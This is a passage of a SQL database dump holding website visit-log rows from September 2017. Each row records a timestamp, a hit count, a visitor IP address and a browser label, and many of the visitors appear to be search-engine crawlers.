209737,1,1,0,0,'141.8.183.1','other'),(155717,1505209824,1,1,0,0,'137.74.207.108','other'),(155718,1505209935,1,1,0,0,'51.255.71.117','other'),(155719,1505210093,1,1,0,0,'217.182.132.193','other'),(155720,1505210163,1,1,0,0,'51.255.65.81','other'),(155721,1505210190,3,3,0,0,'5.45.207.64','other'),(155722,1505210253,1,1,0,0,'46.211.98.208','other'),(155723,1505211154,1,0,1,0,'66.249.76.108',''),(155724,1505211215,1,1,0,0,'141.8.142.21','other'),(155725,1505211345,1,1,0,0,'51.255.65.23','other'),(155726,1505211527,1,1,0,0,'5.45.207.64','other'),(155727,1505211768,1,1,0,0,'37.9.113.78','other'),(155728,1505212106,1,1,0,0,'178.154.171.3','other'),(155729,1505212246,1,1,0,0,'37.54.194.12','chrome'),(155730,1505212262,1,1,0,0,'107.167.104.163','opera'),(155731,1505212276,1,1,0,0,'141.8.183.5','other'),(155732,1505212458,1,1,0,0,'51.255.65.20','other'),(155733,1505212524,15,15,0,0,'192.99.203.35','other'),(155734,1505212740,1,1,0,0,'51.255.71.128','other'),(155735,1505212770,1,1,0,0,'37.9.113.138','other'),(155736,1505212772,1,0,1,0,'66.249.66.74',''),(155737,1505213119,2,2,0,0,'66.249.76.107','chrome'),(155738,1505213256,1,1,0,0,'180.76.15.163','other'),(155739,1505213670,1,1,0,0,'180.76.15.148','other'),(155740,1505213755,1,1,0,0,'188.42.35.150','chrome'),(155741,1505214089,1,1,0,0,'217.182.132.19','other'),(155742,1505214094,1,1,0,0,'37.54.194.12','chrome'),(155743,1505214432,1,1,0,0,'137.74.207.188','other'),(155744,1505214524,1,1,0,0,'51.255.65.63','other'),(155745,1505214949,1,1,0,0,'51.255.65.57','other'),(155746,1505214987,2,2,0,0,'5.45.207.64','other'),(155747,1505215081,1,1,0,0,'141.8.142.21','other'),(155748,1505215178,1,1,0,0,'66.249.66.157','chrome'),(155749,1505215670,1,1,0,0,'180.76.15.145','other'),(155750,1505215813,16,16,0,0,'5.9.156.43','other'),(155751,1505216536,1,1,0,0,'185.137.18.209','chrome'),(155752,1505216547,2,2,0,0,'5.45.207.64','other'),(155753,1505216958,1,1,0,0,'91.196.178.168','chrome'),(155754,1505217083,1,1,0,0,'91.196.177.26','chrome'),(155755,1505217215,1,1,0,0,'141.8.183.1','other'),(155756,1505217239,1,1,0,0,'91.196.178.67','firefox'),(155757,1505217431,1,1,0,0,'66.249.76.91','chrome'),(155758,1505217487,1,1,0,0,'212.90.62.173','other'),(155759,1505217607,2,2,0,0,'5.45.207.64','other'),(155760,1505217764,1,1,0,0,'8.29.198.26','other'),(155761,1505217945,2,2,0,0,'37.9.113.163','other'),(155762,1505217953,1,1,0,0,'176.98.69.187','firefox'),(155763,1505218098,1,1,0,0,'207.46.13.191','other'),(155764,1505218109,1,1,0,0,'188.146.164.31','chrome'),(155765,1505218432,1,1,0,0,'91.196.177.151','chrome'),(155766,1505218437,1,1,0,0,'95.132.22.128','chrome'),(155767,1505218552,1,1,0,0,'141.8.183.1','other'),(155768,1505218614,1,1,0,0,'217.182.132.28','other'),(155769,1505218740,2,2,0,0,'141.8.142.21','other'),(155770,1505218869,1,0,1,0,'66.249.76.107',''),(155771,1505219030,1,1,0,0,'107.167.104.73','opera'),(155772,1505219202,1,1,0,0,'217.182.132.63','other'),(155774,1505219208,1,1,0,0,'91.196.178.67','firefox'),(155775,1505219540,1,1,0,0,'91.196.177.46','chrome'),(155776,1505219678,1,1,0,0,'91.196.178.65','firefox'),(155777,1505220125,1,1,0,0,'37.9.113.163','other'),(155778,1505220207,1,1,0,0,'141.8.142.21','other'),(155779,1505220257,1,1,0,0,'51.255.65.62','other'),(155780,1505220402,1,1,0,0,'95.108.181.58','other'),(155781,1505220608,1,1,0,0,'217.182.132.32','other'),(155782,1505220609,1,1,0,0,'91.196.178.67','chrome'),(155783,1505220657,1,1,0,0,'51.255.65.16','other'),(155784,1505220792,1,0,1,0,'66.249.66.76',''),(155785,1505220793,1,1,0,0,'66.249.76.107','chrome'),(155786,1505221227,1,1,0,0,'91.196.178.135','chrome'),(155787,1505221454,1,1,0,0,'217.182.132.150','other'),(155788,1505221604,1,1,0,0,'217.182.132.17','other'),(155789,1505221718,1,1,0,0,'178.93.172.65','firefox'),(155790,1505221764,3,3,0,0,'95.158.189.118','other'),(155791,1505221857,1,1,0,0,'40.77.167.47','other'),(155792,1505221860,1,1,0,0,'46.149.86.103','msie'),(155793,1505222212,1,1,0,0,'46.201.240.112','firefox'),(155794,1505222271,1,0,1,0,'66.249.76.108',''),(155795,1505222289,1,1,0,0,'217.182.132.81','other'),(155796,1505222485,1,1,0,0,'91.229.121.1','other'),(155797,1505222694,1,1,0,0,'217.182.132.80','other'),(155798,1505222701,1,1,0,0,'107.167.106.111','opera'),(155799,1505222719,1,1,0,0,'91.196.178.67','chrome'),(155800,1505222956,1,1,0,0,'5.45.207.64','other'),(155801,1505223258,1,1,0,0,'217.182.132.155','other'),(155802,1505223310,1,1,0,0,'91.203.26.166','chrome'),(155803,1505223355,1,1,0,0,'46.133.195.143','chrome'),(155804,1505223400,1,1,0,0,'164.132.162.158','other'),(155805,1505224003,1,1,0,0,'46.211.121.229','chrome'),(155806,1505224114,1,1,0,0,'217.182.132.14','other'),(155807,1505224214,1,1,0,0,'91.196.178.67','firefox'),(155808,1505224216,2,2,0,0,'91.209.11.236','other'),(155809,1505224360,1,1,0,0,'46.48.13.161','chrome'),(155810,1505224567,1,1,0,0,'51.255.65.78','other'),(155811,1505224618,1,1,0,0,'107.167.106.111','opera'),(155812,1505224640,1,1,0,0,'141.8.183.1','other'),(155813,1505224678,1,1,0,0,'95.134.169.35','chrome'),(155814,1505224713,1,1,0,0,'91.196.178.161','chrome'),(155815,1505225125,1,1,0,0,'217.182.132.21','other'),(155816,1505225316,1,1,0,0,'217.182.132.154','other'),(155817,1505225432,1,1,0,0,'40.77.167.47','other'),(155818,1505225468,1,1,0,0,'51.255.65.5','other'),(155819,1505225538,2,2,0,0,'91.209.11.236','other'),(155820,1505225836,1,1,0,0,'51.255.71.131','other'),(155821,1505226068,1,1,0,0,'51.255.65.11','other'),(155822,1505226138,1,1,0,0,'91.196.178.135','chrome'),(155823,1505226276,1,1,0,0,'217.182.132.193','other'),(155824,1505226455,1,1,0,0,'217.182.132.80','other'),(155825,1505226473,1,1,0,0,'164.132.162.159','other'),(155826,1505226669,4,4,0,0,'46.229.168.74','other'),(155827,1505226690,5,5,0,0,'46.229.168.67','other'),(155828,1505226710,3,3,0,0,'46.229.168.71','other'),(155829,1505226727,8,8,0,0,'46.229.168.70','other'),(155830,1505226745,2,2,0,0,'46.229.168.72','other'),(155831,1505226767,2,2,0,0,'91.209.11.236','other'),(155832,1505226790,2,2,0,0,'46.229.168.78','other'),(155833,1505226804,12,12,0,0,'46.229.168.69','other'),(155834,1505226846,5,5,0,0,'46.229.168.73','other'),(155835,1505226916,4,4,0,0,'46.229.168.65','other'),(155836,1505226943,2,2,0,0,'46.229.168.75','other'),(155837,1505226988,1,1,0,0,'107.167.104.140','opera'),(155838,1505227000,5,5,0,0,'46.229.168.68','other'),(155839,1505227009,3,3,0,0,'46.229.168.79','other'),(155840,1505227023,1,1,0,0,'217.182.132.73','other'),(155841,1505227120,1,1,0,0,'51.255.65.90','other'),(155842,1505227121,6,6,0,0,'46.229.168.66','other'),(155843,1505227225,2,2,0,0,'46.229.168.76','other'),(155844,1505227313,3,3,0,0,'46.229.168.77','other'),(155845,1505227469,6,6,0,0,'46.229.168.80','other'),(155846,1505227640,1,1,0,0,'91.196.178.67','other'),(155847,1505227726,3,3,0,0,'46.229.168.72','other'),(155848,1505227730,1,1,0,0,'108.59.8.70','other'),(155849,1505227772,3,3,0,0,'46.229.168.70','other'),(155850,1505227836,1,1,0,0,'46.229.168.65','other'),(155851,1505227865,2,2,0,0,'5.45.207.64','other'),(155852,1505227873,7,7,0,0,'46.229.168.74','other'),(155853,1505227943,1,1,0,0,'178.95.0.128','chrome'),(155854,1505227951,1,1,0,0,'91.209.11.236','other'),(155855,1505227982,3,3,0,0,'46.229.168.68','other'),(155856,1505228000,4,4,0,0,'46.229.168.73','other'),(155857,1505228019,2,2,0,0,'46.229.168.67','other'),(155858,1505228036,5,5,0,0,'46.229.168.79','other'),(155859,1505228144,5,5,0,0,'46.229.168.69','other'),(155860,1505228162,4,4,0,0,'46.229.168.76','other'),(155861,1505228421,4,4,0,0,'46.229.168.77','other'),(155862,1505228429,4,4,0,0,'46.229.168.71','other'),(155863,1505228520,6,6,0,0,'46.229.168.75','other'),(155864,1505228555,1,1,0,0,'5.45.207.32','other'),(155865,1505228598,1,1,0,0,'8.29.198.27','other'),(155866,1505228603,1,1,0,0,'78.152.183.61','chrome'),(155867,1505228668,5,5,0,0,'46.229.168.66','other'),(155868,1505228698,3,3,0,0,'46.229.168.72','other'),(155869,1505228719,1,1,0,0,'66.249.76.108','chrome'),(155870,1505228797,4,4,0,0,'46.229.168.65','other'),(155871,1505228841,3,3,0,0,'46.229.168.78','other'),(155872,1505229040,1,1,0,0,'51.255.71.112','other'),(155873,1505229146,3,3,0,0,'46.229.168.68','other'),(155874,1505229165,5,5,0,0,'46.229.168.73','other'),(155875,1505229219,4,4,0,0,'46.229.168.80','other'),(155876,1505229274,3,3,0,0,'46.229.168.69','other'),(155877,1505229329,5,5,0,0,'46.229.168.79','other'),(155878,1505229402,2,2,0,0,'46.229.168.67','other'),(155879,1505229423,4,4,0,0,'46.229.168.74','other'),(155880,1505229442,2,2,0,0,'91.209.11.236','other'),(155881,1505229474,4,4,0,0,'46.229.168.75','other'),(155882,1505229547,2,2,0,0,'46.229.168.70','other'),(155883,1505229657,3,3,0,0,'46.229.168.77','other'),(155884,1505229702,1,1,0,0,'46.229.168.71','other'),(155885,1505229842,9,9,0,0,'46.229.168.65','other'),(155886,1505229919,5,5,0,0,'46.229.168.72','other'),(155887,1505230148,3,3,0,0,'46.229.168.68','other'),(155888,1505230166,2,2,0,0,'46.229.168.76','other'),(155889,1505230213,2,2,0,0,'46.229.168.80','other'),(155890,1505230220,3,3,0,0,'46.229.168.73','other'),(155891,1505230254,1,1,0,0,'51.255.71.117','other'),(155892,1505230392,3,3,0,0,'46.229.168.66','other'),(155893,1505230394,2,2,0,0,'46.229.168.74','other'),(155894,1505230419,3,3,0,0,'46.229.168.78','other'),(155895,1505230466,3,3,0,0,'46.229.168.67','other'),(155896,1505230485,3,3,0,0,'46.229.168.69','other'),(155897,1505230519,1,1,0,0,'51.255.65.93','other'),(155898,1505230567,1,1,0,0,'5.45.207.32','other'),(155899,1505230660,1,1,0,0,'5.45.207.64','other'),(155900,1505230668,3,3,0,0,'46.229.168.75','other'),(155901,1505230777,1,1,0,0,'46.229.168.79','other'),(155902,1505230806,1,1,0,0,'46.229.168.77','other'),(155903,1505230832,1,1,0,0,'46.229.168.71','other'),(155904,1505231717,1,1,0,0,'91.196.178.131','chrome'),(155905,1505231980,2,2,0,0,'141.8.142.21','other'),(155906,1505232399,1,1,0,0,'137.74.207.116','other'),(155907,1505232554,2,2,0,0,'91.209.11.236','other'),(155908,1505232585,1,1,0,0,'51.255.65.90','other'),(155909,1505232801,1,1,0,0,'213.180.203.32','other'),(155910,1505232888,1,1,0,0,'51.255.65.64','other'),(155911,1505232925,1,1,0,0,'95.108.181.69','other'),(155912,1505233136,1,1,0,0,'217.182.132.20','other'),(155913,1505233185,1,1,0,0,'5.45.207.32','other'),(155914,1505233487,1,1,0,0,'194.44.124.150','firefox'),(155915,1505233793,1,1,0,0,'91.209.11.236','other'),(155916,1505234074,2,2,0,0,'141.8.142.21','other'),(155917,1505234220,2,2,0,0,'5.45.207.64','other'),(155918,1505234275,1,1,0,0,'89.19.7.58','firefox'),(155919,1505234283,1,1,0,0,'46.200.122.65','opera'),(155920,1505234376,1,1,0,0,'5.45.207.32','other'),(155921,1505234681,1,1,0,0,'107.167.108.9','opera'),(155922,1505234723,1,1,0,0,'217.182.132.182','other'),(155923,1505235158,2,2,0,0,'5.45.207.64','other'),(155924,1505235160,1,0,1,0,'66.249.66.76',''),(155925,1505235501,1,1,0,0,'51.255.65.84','other'),(155926,1505235533,1,1,0,0,'91.196.178.68','chrome'),(155927,1505235584,3,0,3,0,'66.249.66.156',''),(155928,1505235605,1,1,0,0,'141.8.183.1','other'),(155929,1505235764,1,1,0,0,'217.182.132.187','other'),(155930,1505235914,1,0,1,0,'66.249.76.109',''),(155931,1505235938,1,1,0,0,'91.209.11.236','other'),(155932,1505236497,1,1,0,0,'5.45.207.32','other'),(155933,1505236552,2,2,0,0,'5.45.207.64','other'),(155934,1505236563,1,1,0,0,'51.255.65.93','other'),(155935,1505236566,1,1,0,0,'107.167.108.9','opera'),(155936,1505236722,1,1,0,0,'141.8.183.1','other'),(155937,1505237269,3,3,0,0,'91.209.11.236','other'),(155938,1505237685,1,1,0,0,'66.249.76.91','chrome'),(155939,1505237784,1,1,0,0,'185.70.10.238','other'),(155940,1505237816,1,1,0,0,'141.8.183.1','other'),(155941,1505238146,1,1,0,0,'137.74.207.109','other'),(155942,1505238642,1,1,0,0,'51.255.65.71','other'),(155943,1505238995,2,0,2,0,'66.249.76.108',''),(155944,1505239091,1,0,1,0,'66.249.76.109',''),(155945,1505239142,1,1,0,0,'66.249.76.109','chrome'),(155946,1505239238,1,1,0,0,'91.209.11.236','other'),(155947,1505239335,1,1,0,0,'141.8.183.1','other'),(155948,1505239436,1,1,0,0,'8.29.198.27','other'),(155949,1505239565,2,2,0,0,'5.45.207.64','other'),(155950,1505239731,1,0,1,0,'66.249.66.156',''),(155951,1505239953,1,1,0,0,'66.249.76.107','chrome'),(155952,1505239988,1,1,0,0,'217.69.133.85','other'),(155953,1505240059,1,1,0,0,'81.1.242.33','other'),(155954,1505240286,1,1,0,0,'217.182.132.72','other'),(155955,1505240856,1,1,0,0,'107.167.104.153','opera'),(155956,1505240976,1,1,0,0,'217.69.133.9','other'),(155957,1505241139,1,1,0,0,'92.113.126.30','chrome'),(155958,1505241145,1,1,0,0,'51.255.65.15','other'),(155959,1505241520,1,1,0,0,'79.110.129.188','chrome'),(155960,1505241569,1,1,0,0,'91.196.178.167','chrome'),(155961,1505241752,1,1,0,0,'217.182.132.19','other'),(155962,1505241817,1,1,0,0,'141.8.183.1','other'),(155963,1505242426,1,0,1,0,'66.249.66.156',''),(155964,1505242430,1,1,0,0,'40.77.167.86','other'),(155965,1505242481,1,1,0,0,'5.45.207.64','other'),(155966,1505242885,1,1,0,0,'107.167.104.153','opera'),(155967,1505243002,1,1,0,0,'51.255.65.21','other'),(155968,1505243009,1,1,0,0,'217.182.132.78','other'),(155969,1505243810,1,1,0,0,'137.74.203.194','other'),(155970,1505244694,1,1,0,0,'107.167.104.153','opera'),(155971,1505245121,1,1,0,0,'5.45.207.64','other'),(155972,1505245178,1,1,0,0,'217.182.132.86','other'),(155973,1505245347,1,1,0,0,'217.182.132.153','other'),(155974,1505245990,1,1,0,0,'207.46.13.71','other'),(155975,1505245995,1,1,0,0,'208.110.93.78','other'),(155976,1505246120,1,1,0,0,'217.182.132.31','other'),(155977,1505246219,1,1,0,0,'217.182.132.32','other'),(155978,1505246379,1,0,1,0,'66.249.76.109',''),(155979,1505246480,1,1,0,0,'5.45.207.64','other'),(155980,1505246501,2,2,0,0,'141.8.183.1','other'),(155981,1505246543,1,1,0,0,'91.196.178.33','chrome'),(155982,1505246850,1,1,0,0,'51.255.71.117','other'),(155983,1505246866,1,1,0,0,'66.249.76.107','chrome'),(155984,1505247184,1,1,0,0,'217.182.132.24','other'),(155985,1505247952,1,1,0,0,'180.76.15.23','other'),(155986,1505248165,1,1,0,0,'91.196.178.164','chrome'),(155987,1505248651,1,1,0,0,'217.182.132.32','other'),(155988,1505248737,1,0,1,0,'66.249.76.108',''),(155989,1505249230,1,0,1,0,'66.249.76.109',''),(155990,1505249852,1,1,0,0,'40.77.167.47','other'),(155991,1505250199,1,1,0,0,'5.45.207.64','other'),(155992,1505250277,1,1,0,0,'8.29.198.25','other'),(155993,1505250287,1,1,0,0,'151.80.27.116','other'),(155994,1505250917,1,1,0,0,'217.182.132.90','other'),(155995,1505251851,1,1,0,0,'217.182.132.183','other'),(155996,1505252471,1,0,1,0,'66.249.76.91',''),(155997,1505252575,1,1,0,0,'82.193.99.35','chrome'),(155998,1505253221,1,1,0,0,'51.255.65.66','other'),(155999,1505253348,1,1,0,0,'217.182.132.77','other'),(156000,1505253717,1,1,0,0,'217.69.133.203','other'),(156001,1505253934,1,0,1,0,'66.249.76.107',''),(156002,1505254136,1,1,0,0,'51.255.71.111','other'),(156003,1505254307,1,1,0,0,'51.255.65.39','other'),(156004,1505255544,1,1,0,0,'91.209.11.236','other'),(156005,1505256123,1,1,0,0,'51.255.65.90','other'),(156006,1505256214,1,1,0,0,'51.255.65.54','other'),(156007,1505256259,1,1,0,0,'80.240.128.62','chrome'),(156008,1505256356,2,2,0,0,'51.255.65.74','other'),(156009,1505256488,1,1,0,0,'217.69.133.9','other'),(156010,1505256677,1,1,0,0,'217.182.132.146','other'),(156011,1505256756,1,1,0,0,'217.182.132.155','other'),(156012,1505256909,1,1,0,0,'164.132.162.160','other'),(156013,1505257165,1,0,1,0,'66.249.76.107',''),(156014,1505257491,1,0,1,0,'66.249.66.156',''),(156015,1505257796,1,1,0,0,'91.209.11.236','other'),(156016,1505258423,1,0,1,0,'66.249.76.91',''),(156017,1505258762,3,3,0,0,'91.209.11.236','other'),(156018,1505258872,1,1,0,0,'217.182.132.186','other'),(156019,1505258905,1,1,0,0,'217.182.132.36','other'),(156020,1505259941,1,1,0,0,'217.182.132.74','other'),(156021,1505260056,1,1,0,0,'217.182.132.155','other'),(156022,1505260286,1,1,0,0,'66.249.66.156','chrome'),(156023,1505260593,1,1,0,0,'91.209.11.236','other'),(156024,1505260649,1,1,0,0,'51.255.65.45','other'),(156025,1505260916,1,1,0,0,'217.182.132.150','other'),(156026,1505261107,1,1,0,0,'8.29.198.26','other'),(156027,1505261266,1,1,0,0,'51.255.65.29','other'),(156028,1505261554,1,0,1,0,'66.249.66.156',''),(156029,1505262194,1,1,0,0,'217.69.133.2','other'),(156030,1505262397,1,1,0,0,'217.182.132.76','other'),(156031,1505262467,1,1,0,0,'91.209.11.236','other'),(156032,1505262630,1,1,0,0,'51.255.65.93','other'),(156033,1505263442,2,2,0,0,'5.45.207.64','other'),(156034,1505263587,1,1,0,0,'217.182.132.19','other'),(156035,1505263733,1,1,0,0,'164.132.162.156','other'),(156036,1505264059,1,1,0,0,'217.182.132.148','other'),(156037,1505264165,1,1,0,0,'51.255.65.93','other'),(156038,1505264253,1,1,0,0,'66.249.76.93','chrome'),(156039,1505264496,1,0,1,0,'66.249.76.107',''),(156040,1505264529,1,1,0,0,'51.255.65.55','other'),(156041,1505264642,1,0,1,0,'66.249.66.76',''),(156042,1505264678,1,1,0,0,'51.255.71.132','other'),(156043,1505264702,1,1,0,0,'66.249.66.155','chrome'),(156044,1505265003,1,1,0,0,'51.255.71.128','other'),(156045,1505265150,1,1,0,0,'91.209.11.236','other'),(156046,1505265204,1,0,1,0,'66.249.76.91',''),(156047,1505265585,1,1,0,0,'51.255.71.113','other'),(156048,1505266044,1,1,0,0,'217.182.132.32','other'),(156049,1505266137,1,0,1,0,'66.249.66.76',''),(156050,1505266346,1,1,0,0,'66.249.66.157','chrome'),(156051,1505267774,1,0,1,0,'66.249.76.108',''),(156052,1505267836,1,1,0,0,'176.31.231.10','other'),(156053,1505267845,1,1,0,0,'91.209.11.236','other'),(156054,1505267911,1,1,0,0,'51.255.71.131','other'),(156055,1505269312,1,0,1,0,'66.249.66.155',''),(156056,1505269335,1,1,0,0,'51.255.65.15','other'),(156057,1505269684,1,1,0,0,'144.76.8.134','other'),(156058,1505270386,1,1,0,0,'217.69.133.9','other'),(156059,1505270475,1,0,1,0,'66.249.66.155',''),(156060,1505270599,1,1,0,0,'51.255.71.114','other'),(156061,1505270688,1,1,0,0,'180.76.15.146','other'),(156062,1505270702,1,1,0,0,'107.167.104.73','opera'),(156063,1505270747,1,1,0,0,'217.182.132.187','other'),(156064,1505271191,1,1,0,0,'118.193.244.209','firefox'),(156065,1505271262,1,1,0,0,'217.182.132.154','other'),(156066,1505271493,2,2,0,0,'91.209.11.236','other'),(156067,1505271933,1,1,0,0,'8.29.198.27','other'),(156068,1505272585,1,1,0,0,'51.255.65.28','other'),(156069,1505272810,1,1,0,0,'51.255.65.72','other'),(156070,1505273443,1,1,0,0,'91.209.11.236','other'),(156071,1505273648,1,1,0,0,'51.255.65.37','other'),(156072,1505273900,1,1,0,0,'141.8.183.1','other'),(156073,1505274381,1,1,0,0,'66.249.76.93','chrome'),(156074,1505274419,1,1,0,0,'217.182.132.79','other'),(156075,1505274506,1,1,0,0,'66.249.76.107','chrome'),(156076,1505274674,1,1,0,0,'51.255.65.69','other'),(156077,1505275029,1,1,0,0,'51.255.65.6','other'),(156078,1505275654,1,1,0,0,'51.255.65.71','other'),(156079,1505276565,1,1,0,0,'217.182.132.68','other'),(156080,1505277480,1,1,0,0,'51.255.65.96','other'),(156081,1505277518,1,0,1,0,'66.249.76.109',''),(156082,1505277630,1,1,0,0,'5.45.207.64','other'),(156083,1505277775,1,1,0,0,'51.255.71.130','other'),(156084,1505277792,1,1,0,0,'130.180.208.242','chrome'),(156085,1505278391,1,1,0,0,'217.182.132.149','other'),(156086,1505278603,1,1,0,0,'51.255.71.116','other'),(156087,1505278666,1,0,1,0,'66.249.66.156',''),(156088,1505278986,1,0,1,0,'66.249.66.155',''),(156089,1505279067,2,2,0,0,'91.196.178.66','firefox'),(156090,1505279447,1,1,0,0,'217.69.133.219','other'),(156091,1505279712,1,1,0,0,'217.182.132.151','other'),(156092,1505279800,1,1,0,0,'137.74.207.110','other'),(156093,1505279935,1,1,0,0,'217.182.132.175','other'),(156094,1505280085,1,1,0,0,'91.196.178.71','chrome'),(156095,1505280147,1,1,0,0,'37.55.3.39','chrome'),(156096,1505280417,1,1,0,0,'217.182.132.61','other'),(156097,1505280623,1,1,0,0,'91.196.178.133','chrome'),(156098,1505280905,1,1,0,0,'217.182.132.90','other'),(156099,1505281078,1,1,0,0,'51.255.65.68','other'),(156100,1505281265,1,1,0,0,'217.182.132.69','other'),(156101,1505281590,1,1,0,0,'217.182.132.74','other'),(156102,1505282023,1,1,0,0,'217.182.132.62','other'),(156103,1505282269,1,1,0,0,'137.74.201.108','other'),(156104,1505282309,1,1,0,0,'91.209.11.236','other'),(156105,1505282401,1,1,0,0,'217.182.132.20','other'),(156106,1505282495,1,1,0,0,'91.196.178.66','firefox'),(156107,1505282632,1,1,0,0,'94.178.116.35','other'),(156108,1505282762,1,1,0,0,'8.29.198.26','other'),(156109,1505283648,1,1,0,0,'217.182.132.78','other'),(156110,1505284124,1,1,0,0,'141.8.183.1','other'),(156111,1505284126,2,2,0,0,'51.255.65.32','other'),(156112,1505284226,1,1,0,0,'51.255.65.43','other'),(156113,1505284423,1,1,0,0,'107.167.106.238','opera'),(156114,1505284789,1,1,0,0,'217.182.132.28','other'),(156115,1505285073,1,1,0,0,'51.255.65.11','other'),(156116,1505285388,1,1,0,0,'46.188.39.60','firefox'),(156117,1505285406,1,1,0,0,'91.196.178.36','chrome'),(156118,1505285461,1,1,0,0,'217.182.132.20','other'),(156119,1505285833,1,1,0,0,'107.167.107.16','opera'),(156120,1505285971,1,1,0,0,'217.182.132.191','other'),(156121,1505286582,1,1,0,0,'91.196.178.169','chrome'),(156122,1505286711,1,1,0,0,'217.182.132.77','other'),(156123,1505287502,1,1,0,0,'51.255.71.127','other'),(156124,1505287786,1,1,0,0,'51.255.65.45','other'),(156125,1505287842,1,0,1,0,'66.249.66.75',''),(156126,1505288021,1,1,0,0,'91.196.178.67','chrome'),(156127,1505288309,1,0,1,0,'66.249.76.109',''),(156128,1505288698,1,1,0,0,'51.255.65.32','other'),(156129,1505288852,1,0,1,0,'66.249.66.155',''),(156130,1505289105,1,1,0,0,'217.182.132.185','other'),(156131,1505289353,1,1,0,0,'51.255.71.127','other'),(156132,1505289391,1,1,0,0,'217.182.132.79','other'),(156133,1505289678,1,1,0,0,'51.255.65.97','other'),(156134,1505290187,1,1,0,0,'66.102.9.27','chrome'),(156135,1505290789,1,0,1,0,'66.249.66.155',''),(156136,1505290910,1,1,0,0,'51.255.65.15','other'),(156137,1505291111,1,1,0,0,'217.182.132.157','other'),(156138,1505291401,1,1,0,0,'91.196.178.38','chrome'),(156139,1505291797,1,1,0,0,'46.174.162.192','chrome'),(156140,1505291802,1,1,0,0,'37.54.22.131','chrome'),(156141,1505292234,1,1,0,0,'141.8.183.1','other'),(156142,1505292236,6,6,0,0,'5.45.207.64','other'),(156143,1505292269,1,0,1,0,'66.249.76.89',''),(156144,1505292322,1,1,0,0,'217.182.132.176','other'),(156145,1505292346,1,1,0,0,'107.167.107.16','opera'),(156146,1505292355,1,1,0,0,'40.77.167.86','other'),(156147,1505292656,1,1,0,0,'66.249.76.108','chrome'),(156148,1505292743,1,1,0,0,'151.80.27.116','other'),(156149,1505292836,1,1,0,0,'66.249.76.89','chrome'),(156150,1505292875,1,1,0,0,'51.255.71.120','other'),(156151,1505292915,1,1,0,0,'51.255.65.35','other'),(156152,1505293110,1,1,0,0,'217.182.132.53','other'),(156153,1505293179,1,0,1,0,'66.249.76.109',''),(156154,1505293239,1,1,0,0,'91.196.177.26','chrome'),(156155,1505293363,1,1,0,0,'178.251.107.198','chrome'),(156156,1505293378,2,2,0,0,'5.45.207.64','other'),(156157,1505293520,1,1,0,0,'94.179.21.136','chrome'),(156158,1505293591,1,1,0,0,'8.29.198.27','other'),(156159,1505294064,1,1,0,0,'217.69.133.9','other'),(156160,1505294090,1,1,0,0,'51.255.65.77','other'),(156161,1505294441,2,2,0,0,'5.45.207.64','other'),(156162,1505294674,1,1,0,0,'51.255.65.8','other'),(156163,1505295009,1,1,0,0,'217.182.132.68','other'),(156164,1505295014,1,0,1,0,'66.249.66.75',''),(156165,1505296005,1,1,0,0,'217.69.133.203','other'),(156166,1505296014,1,1,0,0,'141.8.183.1','other'),(156167,1505296125,1,1,0,0,'107.167.106.75','opera'),(156168,1505296156,1,0,1,0,'66.249.76.107',''),(156169,1505296320,1,0,1,0,'66.249.76.91',''),(156170,1505296368,1,1,0,0,'162.210.196.98','other'),(156171,1505296637,12,12,0,0,'167.114.219.41','other'),(156172,1505296799,3,3,0,0,'5.45.207.64','other'),(156173,1505296932,1,1,0,0,'217.69.133.6','other'),(156174,1505297359,1,1,0,0,'188.163.16.6','chrome'),(156175,1505297401,1,1,0,0,'141.8.183.1','other'),(156176,1505297654,1,1,0,0,'217.69.133.2','other'),(156177,1505298014,2,2,0,0,'5.45.207.64','other'),(156178,1505298244,1,1,0,0,'51.255.65.224','other'),(156179,1505298289,1,1,0,0,'107.167.106.75','opera'),(156180,1505298403,1,1,0,0,'217.182.132.151','other'),(156181,1505298739,1,1,0,0,'51.255.65.81','other'),(156182,1505299039,1,1,0,0,'217.182.132.29','other'),(156183,1505299183,1,1,0,0,'51.255.71.113','other'),(156184,1505299239,1,1,0,0,'5.45.207.64','other'),(156185,1505299991,1,1,0,0,'217.182.132.152','other'),(156186,1505300047,1,0,1,0,'66.249.76.107',''),(156187,1505300325,1,0,1,0,'66.249.76.108',''),(156188,1505300347,1,1,0,0,'51.255.65.41','other'),(156189,1505300943,1,0,1,0,'66.249.66.155',''),(156190,1505301507,1,1,0,0,'51.255.65.79','other'),(156191,1505301741,1,1,0,0,'51.255.65.29','other'),(156192,1505301859,1,1,0,0,'91.218.96.93','chrome'),(156193,1505301909,1,1,0,0,'51.255.71.117','other'),(156194,1505302147,1,1,0,0,'217.182.132.76','other'),(156195,1505302199,1,1,0,0,'216.244.66.237','other'),(156196,1505302233,1,1,0,0,'217.182.132.95','other'),(156197,1505302311,1,1,0,0,'217.182.132.58','other'),(156198,1505302492,1,1,0,0,'217.182.132.171','other'),(156199,1505302684,1,0,1,0,'66.249.76.89',''),(156200,1505302794,2,2,0,0,'91.196.178.67','firefox'),(156201,1505302846,1,1,0,0,'141.8.142.21','other'),(156202,1505303532,1,1,0,0,'107.167.107.16','opera'),(156203,1505303821,1,1,0,0,'51.255.65.11','other'),(156204,1505304000,1,1,0,0,'37.52.23.54','firefox'),(156205,1505304079,1,1,0,0,'141.8.183.1','other'),(156206,1505304421,1,1,0,0,'8.29.198.26','other'),(156207,1505304631,1,1,0,0,'91.196.177.46','chrome'),(156208,1505304739,1,1,0,0,'91.196.177.46','firefox'),(156209,1505305141,1,1,0,0,'91.196.178.71','chrome'),(156210,1505305257,2,2,0,0,'5.45.207.64','other'),(156211,1505305267,1,1,0,0,'51.255.71.128','other'),(156212,1505305278,1,1,0,0,'107.167.107.16','opera'),(156213,1505305313,1,1,0,0,'77.120.246.209','chrome'),(156214,1505305848,1,1,0,0,'91.196.178.67','firefox'),(156215,1505305996,1,1,0,0,'51.255.65.5','other'),(156216,1505306112,1,1,0,0,'51.255.65.94','other'),(156217,1505306194,1,1,0,0,'5.228.8.4','msie'),(156218,1505306917,1,1,0,0,'185.137.18.214','chrome'),(156219,1505306978,1,1,0,0,'178.62.239.105','chrome'),(156220,1505307076,1,1,0,0,'5.45.207.64','other'),(156221,1505307407,1,1,0,0,'37.54.164.234','chrome'),(156222,1505307623,1,1,0,0,'137.74.207.188','other'),(156223,1505307995,1,1,0,0,'51.255.65.24','other'),(156224,1505308118,1,1,0,0,'141.8.142.21','other'),(156225,1505308127,1,1,0,0,'217.182.132.17','other'),(156226,1505308447,2,2,0,0,'5.45.207.64','other'),(156227,1505308476,1,1,0,0,'51.255.65.37','other'),(156228,1505308538,1,1,0,0,'137.74.201.99','other'),(156229,15053089